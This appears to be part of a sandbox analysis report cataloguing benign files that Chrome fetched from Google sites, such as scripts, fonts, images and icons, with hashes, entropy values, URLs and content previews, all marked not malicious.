                                                                                                                                                                                                                                                                                          SHA-256:B2F71BA0BD7AC60955BC1EE1F0F57C55E402BB1088738890672D572749065070
                                                                                                                                                                                                                                                                                          SHA-512:212A553664BABA47F4C2B72BCEA07154BA29859A5280B17367EB69988BA89E358C4DF4565220A80E9AA5549EE7138F664C165FDA02327A6F29D3F8AF1B3773F5
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:this._s=this._s||{};(function(_){var window=this;.try{._.Qub=function(a){this.Ul=a};.}catch(e){_._DumpException(e)}.try{.var Rub=function(a){_.On.call(this,a.Ka);var b=this;this.window=a.service.window.get();this.Ba=this.Ul();this.Aa=window.orientation;this.oa=function(){var c=b.Ul(),d=b.SXb()&&Math.abs(window.orientation)===90&&b.Aa===-1*window.orientation;b.Aa=window.orientation;if(c!==b.Ba||d){b.Ba=c;d=_.n(b.Me);for(var e=d.next();!e.done;e=d.next()){e=e.value;var f=new _.Qub(c);try{e(f)}catch(g){_.da(g)}}}};this.Me=new Set;this.window.addEventListener("resize",this.oa);this.SXb()&&this.window.addEventListener("orientationchange",.this.oa)};_.F(Rub,_.On);Rub.Ha=function(){return{service:{window:_.Pn}}};Rub.prototype.addListener=function(a){this.Me.add(a)};Rub.prototype.removeListener=function(a){this.Me.delete(a)};Rub.prototype.Ul=function(){if(Sub()){var a=_.Cl(this.window);a=new _.tl(a.width,Math.round(a.width*this.window.innerHeight/this.window.innerWidth))}else a=this.yc()||(_.k
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 66140, version 1.0
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):66140
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.996477931216715
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:1536:KxxeuzqSLF5LvQ37hdo5q/800RDdTW3lpOdBJWsvmmfFEAMIy7Z4:Kx0uztF5LShGwhoTW3Dbqm8ERIV
                                                                                                                                                                                                                                                                                          MD5:2273633F403CF6571B9331B93F0C8576
                                                                                                                                                                                                                                                                                          SHA1:91736FA1D9068AAB334C71B2BCA2B3ADB7F46264
                                                                                                                                                                                                                                                                                          SHA-256:997980B764CAA9B4F3AD5FEE49479A5D3C07B1A4037F434BF7AA6C6B2190ACCA
                                                                                                                                                                                                                                                                                          SHA-512:54A5E7D8099D4484A1B2CC0BE0372706F150B91885379A51D8DB62BFB9478BAB05C5E094200988FB28F401524A35FFA067A2FEFC3049DE5DB2282AA861F8F647
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://fonts.gstatic.com/s/googlesans/v61/4UasrENHsxJlGDuGo1OIlJfC6l_24rlCK1Yo_Iqcsih3SAyH6cAwhX9RPi4UvaYr.woff2
                                                                                                                                                                                                                                                                                          Preview:wOF2.......\......|...............................S..|...?HVAR...`?STAT..'...(/<.....D..M..\.0..~.6.$..X. ..B..{..[....0eX...'..;G.^9P.Y.L....}W.bL...J.......&..m."\..A........e1..?d..#..[.V. ..2U...R.<..%.iHi....1T..T....B.F.M.........38....!2.0.)I/)u....V.|g$...](I.V*cP'...=|d..}.R>.ERj...^..x..`.x...z..+..wHF.:...{=NwqHB.rL..-.......U...f....W.......s.y\."..+K.w../.B.KQy........1y.N.|j3.P.R........3.........3..[.12..#C.cL..../y.4./|.......pM.f..".M.`..<>-.....'q<@0.....m./.T....^....0 .*.ve.............;...+.$.q.?.G...>o.v.m..m.3.$..._ru.ZK...B....ii..%..N.$!....]I.....x...g^4.....xT....}..\..z..3c.t....gl.6u.....o<..=.}ff..i.@B..Z..a ........=.E%U....Y...... ..]...........d..1../......<*f..q....+....L..0....n...a.w{.....|@.4)&i......{.SS.~JM...Z. ).i/...E..w..w-K$.f2l...n...[."UI.=....} ........H>....:..<.Y.C......Z.9...W..b.......AnR.F.<..(x..-{R]Qt.....kf...M....U..gN.Z..M....y)0....p. .B.L.C3..g..m..~.(.kj$..-......n..o.zA.V.)...4..:.@M.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1280x852, Scaling: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):245622
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.999126695216915
                                                                                                                                                                                                                                                                                          Encrypted:true
                                                                                                                                                                                                                                                                                          SSDEEP:6144:zErzwzM5hanxGWltPB3DcU/spg3xxH3oY4Km9A782UcMd5lHjJSa:3UhaGA/TcU/sEzXoY4KmAo2UcK5lDJn
                                                                                                                                                                                                                                                                                          MD5:BAC9D7A2E987B16FB55E14522558AF40
                                                                                                                                                                                                                                                                                          SHA1:7805D835705A3BB751CB8B1C3901C23FC037DA75
                                                                                                                                                                                                                                                                                          SHA-256:121ECE0A5A504476A71F509BA2F0F2C2119D80E3FBD209C2F6773945FBF507BE
                                                                                                                                                                                                                                                                                          SHA-512:5224B025FA7D77B67D76E0BA12A0FE560DA001395C090DB0C00F95D0A2519FC245669B2AE2DD43402748455E73117F53C8A836C2964405C31678345296E8BA88
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:RIFFn...WEBPVP8 b...0(...*..T.>m,.F."../r....M.^.q.../....[.....W%.......S.o....{..q...O....................?..k?.{.......~.{..{.S.s....=..=...'..V.Q.!.WjOh....W.....?....K..`.,.....G".w._...G.?............`...A...g...............#..X........./..?..L|8.;....P?..D.A.w....7.?.....U.........................?.}..i......G.............?.?.vF....Y..}..x.z..}.9w.L.......g./._.:>m.....#...g.....O._...>....!............._.?.{..>.Y.....................I...K.w.........=.?.v.......m.c.3............X/...Q.....o.7._.?l..=....w.G....=~o.o~.....'.G.l..g....T.w.........../........u......|...0>......s.s.?.......=...*....3../J0+s..s\...#..e.6~......DL....:u|X....v]..h......`.4.z .x?.W...V.:1.f7...1.*.Z......P:.F...4.:....c..)..2N.y.s..h.K.r./M...y.k^.T^g...%.c.f.02.V...Q4....?.gpt........Q..<7........G..fo..........b..............]z...<..3.\.v..7.C@.r..P.jj..,..3L..W.H&..`..Y...H..1....j."...3.g,Q..X..@2.k..8.$..N..BO.........s+..E.V}hU.[.w.._^....BBc(...T..T..k.
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (7408)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):507580
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.613219295391108
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:6144:pG8dOE0eD+EpS4NjBPZ3vhH+p0leR7aKQCn4iE:paYNPZ3pH9AUKQniE
                                                                                                                                                                                                                                                                                          MD5:DCD7F02305FEDA68F0E33013235436AC
                                                                                                                                                                                                                                                                                          SHA1:808E063B84B2EBC684560AE344BDA5C293DD6E9F
                                                                                                                                                                                                                                                                                          SHA-256:238FBDCB7A2938C102A9AFC0DF35D0697EEF4B640A361D1A3DAFE02F85826CAA
                                                                                                                                                                                                                                                                                          SHA-512:84E7FAA2B35FF10C8F8071C12CF237E87FC29ED3BB5A4304C82ED3D4561F18B491E67F6A39391D9940305279094C4707D5D0332F94258A267674530E59A35D84
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:_F_installCss("c-wiz{contain:style}c-wiz>c-data{display:none}c-wiz.rETSD{contain:none}c-wiz.Ubi8Z{contain:layout style}.jbBItf{display:block;position:relative}.DU0NJ{bottom:0;left:0;position:absolute;right:0;top:0}.lP3Jof{display:inline-block;position:relative}.nNMuOd{animation:qli-container-rotate 1568.2352941176ms linear infinite}@keyframes qli-container-rotate{from{transform:rotate(0)}to{transform:rotate(1turn)}}.RoKmhb{height:100%;opacity:0;position:absolute;width:100%}.nNMuOd .VQdeab{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-blue-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .IEqiAf{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-red-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .smocse{animation:qli-fill-unfill-rotate 5332ms cubic-bezier(0.4,0,0.2,1) infinite both,qli-yellow-fade-in-out 5332ms cubic-bezier(0.4,0,0.2,1) infinite both}.nNMuOd .FlKbCe{animation:qli
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):12020
                                                                                                                                                                                                                                                                                          Entropy (8bit):1.3974313983663706
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Yeb7c/dMQpRHqwhPIxt9OqNa2JV9iAoul66BDu5JUroEPXPa5q3Ld7vlAvhWxh:iD8+YDxh
                                                                                                                                                                                                                                                                                          MD5:47903186BD600D99B9F1504193BBBC0E
                                                                                                                                                                                                                                                                                          SHA1:7BBCB0BCF5DFF9CEA8503F84EA5BE4A0736ED365
                                                                                                                                                                                                                                                                                          SHA-256:78CB7394E326BAEDB6BEA727710B4A12369CDE77C3636448FE5E01C34A94ED8C
                                                                                                                                                                                                                                                                                          SHA-512:E384C202D543668B17911B47C3C25D60424E4EF4DA8821624EA4DF25FFBD79C861C4D988182E09FAEB1B3FE3405BA7988D8A6ACF15B8B045A4B1F7A1023C6166
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:{"chunkTypes":"1000011111110011110001000010110100000011111111111111111111111111111110110111111111110101111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111101110111111113101101111111111110111111111111110111111111111111100011011111111111111111111111110101002222222212212212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212121212122212121212121212122212222221221221211122121212121212121212121212121212122212121212121212121212121212121212121212222122122122212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212212121212122212222222222212122121121221212121212121221212122121212212112121212121212122222222121112112222112121212122121212121212122121222222212212212212212112121221212
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):813
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.1177525812347575
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:12:tvCF61JzhgMgsbkCx0J8A9IKLkmbmtSqYzzfXFGtetUw/QOCUpM9YNrhykm:tZ1x0uwdqKL3bfqY9MetU6QeM9Y3Hm
                                                                                                                                                                                                                                                                                          MD5:E3598D780C8FF8607121797205734033
                                                                                                                                                                                                                                                                                          SHA1:631285F021305066437DB867C371AF1EC2E131E2
                                                                                                                                                                                                                                                                                          SHA-256:B95E30C771A3B8FCDF7ABCBC7A5C926D28ADD773E737742A64157406B5E0D973
                                                                                                                                                                                                                                                                                          SHA-512:21829FE3E70E1FF1E14643F062F212DC48A27234364AA2E477A4346B2AF8E9E536CED8673C1CECC31F623227189811EAEC00F58BE1EC7679956FA34D0532BAFF
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg id="GoogleG_FullColor_rgb" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 23 24"><defs><style>.cls-1{fill:#4285f4;}.cls-2{fill:#34a853;}.cls-3{fill:#fabb05;}.cls-4{fill:#e94235;}</style></defs><title>GoogleG_FullColor_rgb_24px</title><g id="_24px" data-name="24px"><path class="cls-1" d="M23,12.27A14,14,0,0,0,22.81,10H12v4h6.09a6.75,6.75,0,0,1-2.36,4.09v3h3.79A11.87,11.87,0,0,0,23,12.27Z"/><path class="cls-2" d="M11.75,24a11.08,11.08,0,0,0,7.77-2.91l-3.79-3a6.94,6.94,0,0,1-4,1.16,7,7,0,0,1-6.59-5H1.26v3.09A11.72,11.72,0,0,0,11.75,24Z"/><path class="cls-3" d="M5.16,14.29a7.09,7.09,0,0,1,0-4.58V6.62H1.26a12.12,12.12,0,0,0,0,10.76Z"/><path class="cls-4" d="M11.75,4.75a6.33,6.33,0,0,1,4.51,1.8h0l3.35-3.42A11.15,11.15,0,0,0,11.75,0,11.72,11.72,0,0,0,1.26,6.62l3.9,3.09A7,7,0,0,1,11.75,4.75Z"/></g></svg>
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (736)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):3516
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.548775726691877
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:ZfSAWM+fMBryd293y+qrocut9Q4msFNC02W5RfNXqzyvBMB6HsByJx8qVKuShZz2:81KrW63y+OocQ9t9bv1qzyVxrSxax
                                                                                                                                                                                                                                                                                          MD5:7437D4F7DC4BAF6E88AB554CDA0B28F4
                                                                                                                                                                                                                                                                                          SHA1:E36353C07E1E38FD6DBAEEE10FD790B580A7FD23
                                                                                                                                                                                                                                                                                          SHA-256:6F2317A8A8668F3043C0A8B24292A3130BAF965BEBB0E8914A4EEA3D16586C95
                                                                                                                                                                                                                                                                                          SHA-512:6C11487D4AD06F67C0E526525FE13CAFDFCAEC62CFC9A944075733119DCC70B2075C6AA933E84A4F6A8A8A3375EDDA1A4FD855E5B219BC5E87BD9331D68EF53E
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:"https://www.gstatic.com/_/mss/boq-one-google/_/js/k=boq-one-google.OneGoogleWidgetUi.en.eh1Y-00lhsg.es5.O/ck=boq-one-google.OneGoogleWidgetUi.hnwCoQrxzwQ.L.B1.O/am=IEAwYGw/d=1/exm=A1yn5d,A7fCU,BVgquf,EEDORb,EFQ78c,GkRiKb,IZT63,JNoxi,KUM7Z,L1AAkb,LEikZe,MI6k7c,MdUzUe,Mlhmy,MpJwZc,NwH0H,O1Gjze,O6y8ed,OTA3Ae,OmgaI,P6sQOc,PrPYRd,QIhFr,RMhBfe,RqjULd,SdcwHb,SpsfSb,UUJqVe,Uas9Hd,Ug7Xab,Ulmmrd,V3dDOb,XVMNvd,Z5uLle,ZDZcre,ZfAoz,ZwDk9d,_b,_tp,aW3pY,aurFic,byfTOb,e5qFLc,ebZ3mb,fKUV3e,gychg,hKSk3e,hc6Ubd,kWgXee,kjKdXe,lazG7b,lsjVmc,lwddkf,mI3LFb,mdR7q,n73qwf,ovKuLd,pjICDe,pw70Gc,s39S4,w9hDv,wmnU7d,ws9Tlc,xQtZb,xUdipf,yDVVkb,yYB61,zbML3c,zr1jrb/excm=_b,_tp,calloutview/ed=1/wt=2/ujg=1/rs=AM-SdHtG5mpbAvjw6lx2uzOrYGtSsP2slQ/ee=EVNhjf:pw70Gc;EmZ2Bf:zr1jrb;JsbNhc:Xd8iUd;K5nYTd:ZDZcre;LBgRLc:SdcwHb;Me32dd:MEeYgc;NPKaK:SdcwHb;NSEoX:lazG7b;Pjplud:EEDORb;QGR0gd:Mlhmy;SNUn3:ZwDk9d;ScI3Yc:e7Hzgb;Uvc8o:VDovNc;YIZmRd:A1yn5d;a56pNe:JEfCwb;cEt90b:ws9Tlc;dIoSBb:SpsfSb;dowIGb:ebZ3mb;eBAeSb:zbML3c;iFQyKf:QIhFr;lOO0Vd:OTA3Ae;nAFL3:s39S4;oGtAuc:sOXFj;pXdRYb:MdUzUe;qafBPd:yDVVkb;qddgKe:xQtZb;wR5FRb:O1Gjze;xqZiqf:wmnU7d;yxTchf:KUM7Z;zxnPse:GkRiKb/m=Wt6vjf,hhhU8,FCpbqb,WhJNk"
                                                                                                                                                                                                                                                                                          Preview:"use strict";this.default_OneGoogleWidgetUi=this.default_OneGoogleWidgetUi||{};(function(_){var window=this;.try{._.q("Wt6vjf");.var Lz=function(a){this.ta=_.y(a,0,Lz.mb)};_.G(Lz,_.C);Lz.prototype.Xa=function(){return _.ll(this,1)};Lz.prototype.oc=function(a){_.xl(this,1,a)};Lz.mb="f.bo";var Mz=function(){_.Go.call(this)};_.G(Mz,_.Go);Mz.prototype.ab=function(){this.ar=!1;Nz(this);_.Go.prototype.ab.call(this)};Mz.prototype.j=function(){Oz(this);if(this.lk)return Pz(this),!1;if(!this.ks)return Qz(this),!0;this.dispatchEvent("p");if(!this.qp)return Qz(this),!0;this.bo?(this.dispatchEvent("r"),Qz(this)):Pz(this);return!1};.var Rz=function(a){var b=new _.su(a.yx);a.cq!=null&&b.l.set("authuser",a.cq);return b},Pz=function(a){a.lk=!0;var b=Rz(a),c="rt=r&f_uid="+_.Ll(a.qp);_.kq(b,(0,_.E)(a.l,a),"POST",c)};.Mz.prototype.l=function(a){a=a.target;Oz(this);if(_.rq(a)){this.hn=0;if(this.bo)this.lk=!1,this.dispatchEvent("r");else if(this.ks)this.dispatchEvent("s");else{try{var b=_.uq(a),c=JSON.pars
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1168
                                                                                                                                                                                                                                                                                          Entropy (8bit):4.186846820567803
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:tzLNjuhNxcQzadn/RaSAOX5q49asPdkhxEFV4efgRvFbxXh128RpCThFc01kBMN7:5NGMQzaZ/MSNs49aEdkbEX4eEvVIZThL
                                                                                                                                                                                                                                                                                          MD5:D05A4360FDF0883BD63CD699ED2417B9
                                                                                                                                                                                                                                                                                          SHA1:81EAB35B7605F78C4BEB600F436FE99121F603E5
                                                                                                                                                                                                                                                                                          SHA-256:ECB482338A6D7A86B9EC1C65B3D6EEAE81F976E64BD0E9712A53262E87DBBA07
                                                                                                                                                                                                                                                                                          SHA-512:E707841258DC365BA774622FFCD1695463DF48853ABBF8CD623A1180B20CA39468C76CCD4B218CD98F4F38824100DCBB3C326FF09011126D4A1EC7C0DFF65A11
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:<svg width="32" height="34" viewBox="0 0 32 34" fill="none" xmlns="http://www.w3.org/2000/svg">.<path d="M3.45308 6.99992H6.78642V8.66659C6.78642 10.4999 8.28642 11.9999 10.1198 11.9999H20.1198C21.9531 11.9999 23.4531 10.4999 23.4531 8.66659V6.99992H26.7864V15.3333H30.1198V6.99992C30.1198 5.16659 28.6198 3.66659 26.7864 3.66659H19.8198C19.1198 1.73325 17.2864 0.333252 15.1198 0.333252C12.9531 0.333252 11.1198 1.73325 10.4198 3.66659H3.45308C1.61975 3.66659 0.119751 5.16659 0.119751 6.99992V30.3333C0.119751 32.1666 1.61975 33.6666 3.45308 33.6666H13.4531V30.3333H3.45308V6.99992ZM15.1198 3.66659C16.0364 3.66659 16.7864 4.41659 16.7864 5.33325C16.7864 6.24992 16.0364 6.99992 15.1198 6.99992C14.2031 6.99992 13.4531 6.24992 13.4531 5.33325C13.4531 4.41659 14.2031 3.66659 15.1198 3.66659Z" fill="#202124"/>.<path d="M31.3698 19.0833C30.6864 18.3999 29.5531 18.3999 28.8698 19.0833L20.9698 26.9999L17.2031 23.2499C16.5198 22.5666 15.4031 22.5666 14.7031 23.2499C14.0198 23.9333 14.0198 25.0666 14
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):2418
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.8871913655312085
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:48:Em8Mqtv9zlBVzCIe35iAtX8LfGlwPT9LaFRlmYKK3scbZz:EHFzYIeM4X8LfG2JWFrYh0Zz
                                                                                                                                                                                                                                                                                          MD5:9260A8DCEE81975E5E846E02A40E552D
                                                                                                                                                                                                                                                                                          SHA1:27A65184CC09909E0DCC4F68475C2CB39EB49534
                                                                                                                                                                                                                                                                                          SHA-256:E074AF7EBCC9E834048188F71F5CF3BD1EBED4657DBCA76F8DDA50BC6C72B019
                                                                                                                                                                                                                                                                                          SHA-512:49A277DABC2530D3001294392C303AADA5F51C73172CFF66C44B83CFF2CF163090D5ED851D5B547767A1BE9E3B78CB96FAC418087B981D4CEE938B9A2D7F0131
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://maps.googleapis.com/maps/vt?pb=!1m5!1m4!1i4!2i3!3i7!4i256!2m3!1e0!2sm!3i707457713!3m17!2sen!3sUS!5e18!12m4!1e68!2m2!1sset!2sRoadmap!12m3!1e37!2m1!1ssmartmaps!12m4!1e26!2m2!1sstyles!2zcy5lOmd8cC5jOiNmNGY0ZjQscy5lOmcuc3xwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b2ZmLHMuZTpsLml8cC52Om9mZixzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy5lOmwudC5zfHAuYzojZjVmNWY1LHMudDoyMXxzLmU6bC50LmZ8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmd8cC5jOiNmNGY0ZjQscy50OjJ8cy5lOmwudC5mfHAuYzojNzU3NTc1LHMudDo0MHxzLmU6Z3xwLmM6I2Y1ZjVmNSxzLnQ6NDB8cy5lOmwudC5mfHAuYzojZjRmNGY0LHMudDozfHMuZTpnfHAuYzojZmZmZmZmLHMudDo1MHxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjQ5fHMuZTpnfHAuYzojZTllOWU5LHMudDo0OXxzLmU6bC50LmZ8cC5jOiM2MTYxNjEscy50OjUxfHMuZTpsLnQuZnxwLmM6IzYxNjE2MSxzLnQ6NjV8cy5lOmd8cC5jOiNlOWU5ZTkscy50OjY2fHMuZTpnfHAuYzojZWVlZWVlLHMudDo2fHMuZTpnfHAuYzojYmZjZGRiLHMudDo2fHMuZTpsLnQuZnxwLmM6IzllOWU5ZSxzLmU6bHxwLnY6b24!4e0!5m1!1e3!23i47083502&key=AIzaSyBux5gy-wv-c21aQl2an30LCk2KY4M9teI&token=106269
                                                                                                                                                                                                                                                                                          Preview:RIFFj...WEBPVP8L].../..?.w...$..+.gF...FR......^...$..>..+d.p...........L.n...,%y.(......m{.6J9.......gp....C};.By;!.Tzb;........w.n.W..Wn.U.M....f.-...Gl.P..cG._a.......40...v..D..+.....&.*.,..U..n.@zB.I.,eDdy....H.\,M..._.PNT...ds5..\.8sRNf.].)..z..`>n&..#.YO.S[.$.Y.-.-.e........{><..v}....:.......[N..k...2.d.........O.R..b.pch.v:UO..q.&..k.K.#+....|....).Y{..,0.8...Z;m../.kR...K........w....".;.$`4....1Y;.....Wz%_....2+.....,g6dc...>......X..n....vq{-....o6..2......2..N#....>|#......b%Q).#...+S.|...]...$[...3!k..n..h..6]c.......D.W...o..I0.|.Zh.iT.2...D..?'D... .`.m.6..b.7+...*.H....+.h.X...K.62....N~......D&: ....h7..mmT.+....M.........d-.|..&.f...f.d.L.....lQ.J....1...C.].t.d{...2.u.....p..lvK...".H.}.5~ZN.08z`t.u..F.D...........I....$[...T.......[g~.i...b...>r....e..=...Z...l..y....~..{..i.]......._.^./.....{........kK.z._}q.....}8.J.Ul..{.....W.y.k$.Of.|.<.}4..k.z....[}n..&.....(........oX..{.'........h....Ao.Nv.$./.\V....o<
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (1196)
                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                          Size (bytes):1684
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.253406765425037
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:HlJapDAMVK1BtV0oRgAR5VF9qiTvvKyrdrSaGW6xEuZ1F8pYSHy/:aZK190bAFrqizPJrSxZ46
                                                                                                                                                                                                                                                                                          MD5:5B3CECC8B01A4C47588E747F9F979EDD
                                                                                                                                                                                                                                                                                          SHA1:11FB2BEDE891F96330A54CAD7D84D4357A2FBCF2
                                                                                                                                                                                                                                                                                          SHA-256:69A82DD792864C3651FC5FC0296220FBEEE55334EF04EEBB84C943D5B286DC41
                                                                                                                                                                                                                                                                                          SHA-512:27752B6620B2E83FF08E0F1F10F38D8157997B6D4C4EEC57DB412281411AF3BD151E55D90D1373EC56F0CA53AD7263C4603F96D941D0CC8EB6A8973BAE79C2CB
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          Preview:import{r as m,s as d,x as p}from"./ycaG4YXp.min.js";import{e as c}from"./0XPwTFcg.min.js";import{n as f}from"./IYoTYjYE.min.js";import{i as u}from"./IFunn9hk.min.js";import{o as y}from"./5Ss99t85.min.js";const h=":host{width:100%}details{width:100%}summary{list-style:none;display:flex;gap:12px;justify-content:space-between;align-items:center}summary::-webkit-details-marker{display:none}summary:hover{cursor:pointer}.icon{transition:all .3s ease-in-out;transform:rotate(0);transform-origin:center;display:flex;justify-content:center;align-items:center}details[open] .icon{transform:rotate(180deg)}.details--hsw .summary{padding:24px 0;border-bottom:1px solid var(--details-border-color, #dadce0);color:#202124;font-family:Google Sans Text,Roboto,Noto,sans-serif;font-size:16px;line-height:24px;font-weight:400;letter-spacing:.1px;color:#3c4043;font-weight:500}.details--hsw .content{padding:0}";var v=Object.defineProperty,w=Object.getOwnPropertyDescriptor,n=(l,e,o,r)=>{for(var t=r>1?void 0:r?w(e,
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, Exif Standard: [TIFF image data, little-endian, direntries=2, orientation=upper-left], baseline, precision 8, 700x393, components 3
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):66025
                                                                                                                                                                                                                                                                                          Entropy (8bit):7.966848272424233
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:1536:h4YW1GGfTxtqnhYLf/VCWI66gt9Q4dgHceiXVc1N1CMk4:hnWtfynhYLfNCWn9OhpilcJC/4
                                                                                                                                                                                                                                                                                          MD5:66A9D7B104D1DF6791C122CD1C63114A
                                                                                                                                                                                                                                                                                          SHA1:56252C94EC0396E0EA1EC2050719C553687EFFC0
                                                                                                                                                                                                                                                                                          SHA-256:B16C1AFD9E08E4A09ABB87AF3B7601DD4053A4292ED98627018964F9948E46B1
                                                                                                                                                                                                                                                                                          SHA-512:901A020A1D0AC4079CC4AB9AD74289F0DDBE8CFBC3504A0F6934B82E331C17CDB7CF040C233E05205E54AA92D9B6AA3AA69DA821E41DFC86B2C56CAE38B4B211
                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                          URL:https://www.gstatic.com/marketing-cms/assets/images/09/41/1167916d4497af11b4bf47c6d8da/43.webp=w700
                                                                                                                                                                                                                                                                                          Preview:......JFIF.............@Exif..II*...................i.......&............................8Photoshop 3.0.8BIM........8BIM.%..................B~....ICC_PROFILE...............mntrRGB XYZ .........$..acsp.......................................-....).=..U.xB...9.................................desc...D...ybXYZ........bTRC........dmdd........gXYZ...h....gTRC........lumi...|....meas.......$bkpt........rXYZ........rTRC........tech........vued........wtpt...p....cprt.......7chad.......,desc........sRGB IEC61966-2-1 black scaled..................................................................................XYZ ......$.........curv.......................#.(.-.2.7.;.@.E.J.O.T.Y.^.c.h.m.r.w.|...............................................................%.+.2.8.>.E.L.R.Y.`.g.n.u.|.........................................&./.8.A.K.T.].g.q.z...............................!.-.8.C.O.Z.f.r.~......................... .-.;.H.U.c.q.~.......................+.:.I.X.g.w.....................'.7.H.Y.j.{..
                                                                                                                                                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                          File Type:ASCII text, with very long lines (867)
                                                                                                                                                                                                                                                                                          Category:downloaded
                                                                                                                                                                                                                                                                                          Size (bytes):1381
                                                                                                                                                                                                                                                                                          Entropy (8bit):5.405763853125201
                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                          SSDEEP:24:LHlnIZO5jvu88gakBeOtaO5M1QmwFyTzjIdPnU3Y4vaglcl76dMMSJR5dsb7bO:t5FG885kBfda1Q8T3IdnUQOcIdMMSJJR
                                                                                                                                                                                                                                                                                          MD5:54A639674E3A0C838A7C4EA38CA9FF5F
